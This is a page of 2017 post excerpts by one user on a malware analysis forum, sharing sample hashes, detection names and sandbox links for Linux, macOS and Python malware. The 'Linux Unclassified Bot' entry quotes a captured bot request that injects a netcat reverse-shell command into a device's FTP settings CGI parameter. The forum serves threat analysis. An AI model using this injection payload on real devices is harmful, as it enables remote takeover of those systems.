A forum for reverse engineering, OS internals and malware analysis 


Re: TrojanSpy:MSIL/Lachemp.A sample request

 by K_Mikhail ¦  Sun Aug 06, 2017 5:01 pm ¦  Forum: Completed Malware Requests ¦  Topic: TrojanSpy:MSIL/Lachemp.A sample request ¦  Replies: 2 ¦  Views: 8599

BTW, HEUR:Trojan.MSIL.Tpyn.chu (Kaspersky) can also be reproduced on the sample with SHA1: 2d3de82a04024b124411fb764cee44b803996a57, which belongs to the EternalRocks malware family.

Linux Unclassified Bot

 by K_Mikhail ¦  Sat Jul 15, 2017 7:42 pm ¦  Forum: Malware ¦  Topic: Linux Unclassified Bot ¦  Replies: 1 ¦  Views: 9487

Hello! Found on: https://detux.org/report.php?sha256=8c56e2971649d137917e0e1b45985473e68e803bd374c8a5c0b4c4decdb4751a GET /set_ftp.cgi?loginuse= &loginpas= &next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+11.11.11.111+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0 GET /ftpt...

Linux PWS Trojan

 by K_Mikhail ¦  Thu Jul 06, 2017 4:41 pm ¦  Forum: Malware ¦  Topic: Linux PWS Trojan ¦  Replies: 0 ¦  Views: 4699

Hello! Found on [1] https://malwr.com/analysis/NmM4NGQ4ZWRiY2I0NDE2NjkxZTgwMWMxOTVkZWI4ZWM/ (unupx) [2] https://malwr.com/analysis/MWJmZWE5N2ZlZWFiNDExMzlmN2RhNTJmY2FkYjkwZWY/ (upx) Detection is poor: 1/56 for both variants: https://virustotal.com/en/file/0e32b7ce2b64b9f993b7431a2b89484c8a3990fcc...

Python/Filecoder.R

 by K_Mikhail ¦  Thu Jul 06, 2017 6:43 am ¦  Forum: Completed Malware Requests ¦  Topic: Python/Filecoder.R ¦  Replies: 1 ¦  Views: 3550

Hello!

I'm looking for the Python/Filecoder.R sample, which was mentioned in this article: https://www.welivesecurity.com/2017/06/ ... t-ukraine/

SHA1: AF07AB5950D35424B1ECCC3DD0EEBC05AE7DDB5E

Thanks for assistance!

Re: OSX Kirino (BigFive) BackDoor

 by K_Mikhail ¦  Mon Jul 03, 2017 6:16 pm ¦  Forum: Malware ¦  Topic: OSX Kirino (BigFive) BackDoor ¦  Replies: 2 ¦  Views: 5639

Mac.BackDoor.BigFive.1, Mac.BackDoor.BigFive.2, Mac.BackDoor.BigFive.3 renamed to Mac.BackDoor.Kirino.1, Mac.BackDoor.Kirino.2, Mac.BackDoor.Kirino.3.

OSX Kirino (BigFive) BackDoor

 by K_Mikhail ¦  Mon Jul 03, 2017 10:59 am ¦  Forum: Malware ¦  Topic: OSX Kirino (BigFive) BackDoor ¦  Replies: 2 ¦  Views: 5639

Subj [1] https://virustotal.com/en/file/2ccd0e9df8c2411dfe60b76edb25607193bfb316acac21b7250be65c37215ca3/analysis/1499079161/ (HEUR:Exploit.OSX.CVE-2016-4625.a || Exploit.CVE-2016-4625.1 || a variant of OSX/Exploit.CVE-2016-4625.B) [2] https://virustotal.com/en/file/5b13a275c3d33465a5c323558b1bf8bbb...

Re: Old osx worm "Niqtana"

 by K_Mikhail ¦  Thu Jun 29, 2017 9:03 am ¦  Forum: Completed Malware Requests ¦  Topic: Old osx worm "Niqtana" ¦  Replies: 2 ¦  Views: 9960

Hello!

http://contagiodump.blogspot.com/2012/0 ... lware.html

2007 Worm.OSX.Niqtana.a 2C25908053ECC1474D2FB2C530EA5CFA

Re: Possibly OS/X Ransomware (File coder)

 by K_Mikhail ¦  Thu Jun 15, 2017 1:52 pm ¦  Forum: Malware ¦  Topic: Possibly OS/X Ransomware (File coder) ¦  Replies: 5 ¦  Views: 14123

Thanks for attaching the file!

Despite the screaming alarm string, the file has in fact been marked as clean by Dr.Web's and KL's virus labs.

Re: Linux/FileCoder (Linux.Encoder)

 by K_Mikhail ¦  Tue Jun 13, 2017 7:58 am ¦  Forum: Malware ¦  Topic: Linux/FileCoder (Linux.Encoder) ¦  Replies: 18 ¦  Views: 52224

SHA1: d7b0255d7d98c33a30fe71543ec98d802c2a2dd7 FileCoder.O (NOD32) || Ransom:Linux/Erebus.A: https://www.virustotal.com/en/file/d889734783273b7158deeae6cf804a6be99c3a5353d94225a4dbe92caf3a3d48/analysis/ UPD: SHA1: ffebffc89a0b417e56dea3fdce962ee54f7ce00f : https://www.virustotal.com/en/file/0b7996bc...

Possibly OS/X Ransomware (File coder)

 by K_Mikhail ¦  Mon Jun 12, 2017 8:31 pm ¦  Forum: Malware ¦  Topic: Possibly OS/X Ransomware (File coder) ¦  Replies: 5 ¦  Views: 14123

Hello! Possibly OS/X Ransomware (File coder). [1] https://malwr.com/analysis/MWRiOTVhZmEzMjQ2NGUxYTg1ZWRhMTJkZWY4ODg5YTc/ (Mach-O 64-bit, not downloadable); Alarm-string: "Send me this identifier together with your $$$$ to derypt your file" [2] https://virustotal.com/en/file/4c27249bced8cb185a84671f...